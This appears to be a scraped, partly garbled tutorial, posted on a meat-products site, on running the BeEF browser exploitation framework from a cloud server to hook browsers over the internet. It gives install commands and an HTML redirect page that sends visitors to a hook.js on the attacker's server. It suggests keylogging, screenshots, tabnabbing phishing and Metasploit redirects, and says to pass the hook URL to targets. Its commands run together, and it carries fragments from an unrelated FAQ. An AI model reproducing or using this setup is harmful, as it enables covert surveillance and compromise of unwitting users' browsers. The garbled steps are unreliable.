PH. 612-314-6057

How to Use the Browser Exploitation Framework (BeEF) Over a Wide Area Network

Post date |
Robby

The Browser Exploitation Framework (BeEF) is a popular open source penetration testing tool used to assess the security of web applications BeEF works by hooking one or more web browsers and using them as launch points for further attacks against the system.

While BeEF is typically used on browsers within a local area network, it is also possible to configure it to work over a wide area network (WAN). This allows security researchers to evaluate the attack surface of a web application from anywhere in the world.

In this guide we will walk through the steps to set up BeEF on a cloud server and use it to hook browsers across the public internet.

Overview

Here is a quick rundown of the components we will use:

  • DigitalOcean – We will use DigitalOcean to spin up a Ubuntu cloud server that will host our BeEF command and control (C2) server

  • BeEF – We will install the BeEF framework on the cloud server. This will be the C2 used to hook and control browsers.

  • Apache – An Apache web server will relay traffic from the internet to the BeEF C2.

  • Custom HTML Page – We will edit the Apache default page to redirect visitors to our BeEF hook URL.

Once set up, we will test it out by launching attacks across the WAN against a browser under our control.

Set Up the Cloud Server Environment

We will use DigitalOcean to easily spin up a cloud server ready for BeEF.

  1. Create a new Ubuntu 18.04 droplet on DigitalOcean. Use whatever size makes sense for your testing.

  2. Add a firewall rule to open TCP port 3000. This is the default port that BeEF uses.

  3. SSH into the server to begin the installation process.

Install BeEF on the Cloud Server

With the cloud server ready, we can now install BeEF.

  1. Update the server packages:

    sudo apt update && sudo apt upgrade -y

  2. Install dependencies required by BeEF:

    sudo apt install ruby ruby-dev git build-essential libsqlite3-dev

  3. Install the Ruby gem package manager:

    sudo apt install rubygems

  4. Use gem to install BeEF:

    sudo gem install beef

This will take a few minutes to compile and install BeEF and all its dependencies.

  1. Create a new directory for the BeEF configuration and clone the BeEF source:

    mkdir ~/beefcd ~/beefgit clone https://github.com/beefproject/beef

  2. Copy the default configuration to get started:

    cd beefcp config.yaml.example config.yaml

We now have BeEF installed and ready to start configuring.

Configure Apache Web Server

In order for external web browsers to connect to the BeEF C2 server, we need to route traffic from the internet to BeEF. We can use Apache for this purpose.

  1. Install Apache:

    sudo apt install apache2

  2. Start Apache:

    sudo systemctl start apache2

  3. Verify that Apache is running by visiting your server’s public IP address. You should see the default Apache page.

We will edit this default page later to point visitors to our BeEF hook.

Start the BeEF C2 Server

With Apache running, we can now start the BeEF command and control (C2) server.

  1. Start the BeEF service:

    cd ~/beef/beef./beef

    This will start the BeEF console on port 3000.

  2. To access the BeEF console, tunnel local port 3000 to the remote server’s port 3000:

    ssh -L 3000:localhost:3000 root@SERVER_IP

  3. Now visit http://127.0.0.1:3000 in your local browser. You should see the BeEF login page.

  4. Login with the default credentials:

    • Username: beef
    • Password: beef

You now have access to the BeEF control panel to manage hooked browsers.

Configure Apache Index Page

Currently, the default Apache home page does not lead visitors to BeEF. We need to modify the default index page.

  1. Edit the default Apache index file:

    sudo vim /var/www/html/index.html

  2. Replace the contents with code to redirect to the BeEF hook URL:

    html

    <html>  <head>     <meta http-equiv="refresh" content="0; url=http://YOUR-SERVER-IP:3000/hook.js">  </head>  <body>     <p>Please follow <a href="http://YOUR-SERVER-IP:3000/hook.js">this link</a>.</p>  </body></html>

    Console

    Be sure to replace YOUR-SERVER-IP with your server’s public IP.

  3. Save the changes to index.html.

Now when a browser visits your server’s public IP, it will load the index page and get redirected to the BeEF hook script.

Launching Attacks Over WAN

Our BeEF C2 infrastructure is now ready for browsers to connect from across the internet!

Let’s test it out.

  1. On the BeEF console, go to the Hooked Browsers page.

  2. On your local machine, visit the public IP for your BeEF server. This will load the index page we modified earlier.

  3. You should now see your local browser show up under Hooked Browsers in the BeEF console.

  4. Click on your hooked browser and try running a sample BeEF module like “Detect Fake AV Software.”

  5. You should see the module execute on your local browser, even though it is connecting over the public internet.

And that’s it! You can now use BeEF to hook browsers and launch attacks from anywhere in the world.

Here are some other attacks you could try out over WAN:

  • Use the Social Engineering module to spawn fake dialog boxes.

  • Capture keystrokes remotely with the Key Logger module.

  • Take screenshots of the target browser with the Pretty Theft module.

  • Use TABnabbing to swap loaded tabs with phishing pages.

  • Redirect the browser to a Metasploit payload for further exploitation.

The possibilities are endless! Just be sure to get permission before testing against real users.

Configuring BeEF to work over a WAN is straightforward with a cloud server provider like DigitalOcean. With just a few simple steps, you can spawn a BeEF command and control server accessible from anywhere.

Some key takeaways:

  • Use a cloud provider to easily create servers ready for BeEF.

  • Install BeEF and its dependencies using the apt and gem managers.

  • Configure Apache web server to relay traffic to the BeEF process.

  • Modify the default Apache page to redirect visitors to the BeEF hook URL.

  • Try out BeEF modules against remotely hooked browsers.

Setting up BeEF over WAN is a great way to evaluate the security of web applications from different networks. Just be sure to get permission first and use it ethically!

how to use beef over wan

db_host “Your Public Ip”_

how to use beef over wan

now close and save that file.

Root@Kali:~# /Usr/Share/Beef-Xss Type Cd Extensions/Metasploit/ Root@Kali:/Usr/Share/Beef-Xss/Extensions/Metasploit#

then while in there type leafpad config.yaml

how to use beef over wan

And where i have put !!your ip here!! on the picture above^ put your public ip

Using BeEF Framework outside the local network using BeEF over WAN

FAQ

What is the default username and password for BeEF?

We’ve successfully set-up the BeEF exploitation framework. The default username and password are beef:beef. When we’ve successfully authenticated, the below web page is presented to us: We can see that the web page first greets us and presents the basic information and getting started guide about BeEF.

What is BeEF XSS?

It is a penetration testing tool that focuses on the web browser. Amid growing concerns about web-born attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors.

What is the BeEF tool in Linux?

What Is BeEF. BeEF, the Browser Exploitation Framework, is a tool ethical hackers use to assess and exploit vulnerabilities within web browsers. Unlike many other security tools focusing on system or server-side vulnerabilities, BeEF focuses on the client side – specifically, the user’s web browser.

Which of the following ports is used by the browser exploitation framework?

This screen tells us that BeEF is running on two different interfaces, locally and internally, both on port 3000.

How to use beef XSS framework over Wan?

The default username is beef and password is beef. Now pass on the hooking URL to the target, Once the target clicks it. You should be able to see their IP address and browser information in your admin panel. Here you can see the video demonstration of Beef Xss Framework over WAN.

How to use beef over Wan script?

Paste the URLs in the other terminal where the beef over wan script is running. Sign in to the admin, Do remember the URL will be different for you guys so make sure you type in the correct one. The default username is beef and password is beef. Now pass on the hooking URL to the target, Once the target clicks it.

How do I check if a beef service is working?

The easiest way to check that is to login to the BeEF user interface. This URL was given to us when we started the BeEF service, in our case it was: Navigating to this gives us a login screen, so we need the username and password that we initially put into the config file.

Related posts:

  1. How Long to Dehydrate Beef Jerky at 165°F for Perfect Results
  2. Perfectly Tender Crockpot Italian Beef – Made Easy with Frozen Meat
  3. How Long to Cook Beef Marrow Bones for Your Dog – A Detailed Guide
  4. Elevate Your Beef Mince Dishes With Herbs

Leave a Comment

Contact Information

1401 Marshall Street NE #100
Minneapolis MN 55413
Phone:
612-314-6057

Join Us

 

 

 

 

Navigation

Latest Article

How to Eat Moo Shu Pork Like a Pro

Master the Perfect Oven-Roasted Beef Shoulder Steak

How to Easily Make Beef Gravy from Beef Broth

Tracing the Journey: Where is Smithfield Bacon Processed?

Turkey Bacon vs Pork Bacon: Which Type of Bacon is Healthier?

Why Does Ground Beef Give Me Diarrhea?

Demystifying Hong Shao Pork: A Close Look at This Classic Chinese Braised Dish

Exploring the Versatile Beef Cut Known as Pectoral Meat

How To Make Delicious Fareway Italian Pork Pinwheels – A Step-By-Step Guide

How Long to Cook a Turkey at 250 Degrees for Moist, Tender Results

COPYRIGHT ©2024 RED TABLE MEATS - INDEPENDENTLY OWNED AND OPERATED. ALL RIGHTS RESERVED.